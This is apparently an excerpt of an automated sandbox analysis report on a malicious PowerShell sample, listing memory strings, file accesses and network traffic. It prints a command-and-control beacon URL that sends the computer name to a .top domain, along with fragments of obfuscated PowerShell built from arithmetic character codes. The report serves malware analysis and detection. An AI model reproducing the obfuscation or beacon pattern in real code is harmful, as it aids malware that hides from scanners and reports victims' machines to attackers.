Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB86000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb}a source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8 |
Source: global traffic | HTTP traffic detected: GET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: gajaechkfhfghal.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php? |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527 |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.2753530709.0000029A3F8F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527p |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A2892F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ezsadh724cyuq98.(([system.String]::new(@((4698-4631),(94+(-4977+(9514-(6894-2374)))),(-7336+7448),(1064800/8800),(-2056+2140),(-3844+(6916-2961))))))( $szl8g71o0ri2mnu ) $ezsadh724cyuq98.((-join (@((-2730+2797),(-7577+(-1895+(40935340/(23091292/5404)))),(88578/(1165878/1461)),(1669-1554),(956-855))| ForEach-Object { [char]$_ })))()$380do6izmun74vj.((-join (@((460893/(13262712/1928)),(9783-(11209-1534)),(5335-5224),(-5309+5424),(3807-3706))| ForEach-Object { [char]$_ })))()[byte[]] $ioy3gwv4625ncs7 = $szl8g71o0ri2mnu.((-join (@((5469-5385),(3005-(29455132/10178)),(-638+703),(714210/(716+(1863+3686))),(8405-8291),(1573-(-5430+(14372-(17597362/(3924405/(-7152+(1830+(6323235/905)))))))),(1494-(-2271+(5349392/1468))))| ForEach-Object { [char]$_ })))() $cwbzftra792duoj=$ioy3gwv4625ncs7 return $cwbzftra792duoj}[System.Text.Encoding]::ascii.(([system.String]::new(@((6543-(59781864/9237)),(7327-(73546228/(19139-8961))),(3346-(11198410/3467)),(41583/501),(-659+775),(-4892+5006),(710745/6769),(8704-(20144336/(1310296/(2176187/(27757090/(3694+(-2918+(16545-(81843921/8031))))))))),(7608-(5450+(18480615/(19190-(11913-1716)))))))))((vyqsxj5am76zg41binc9trw230h 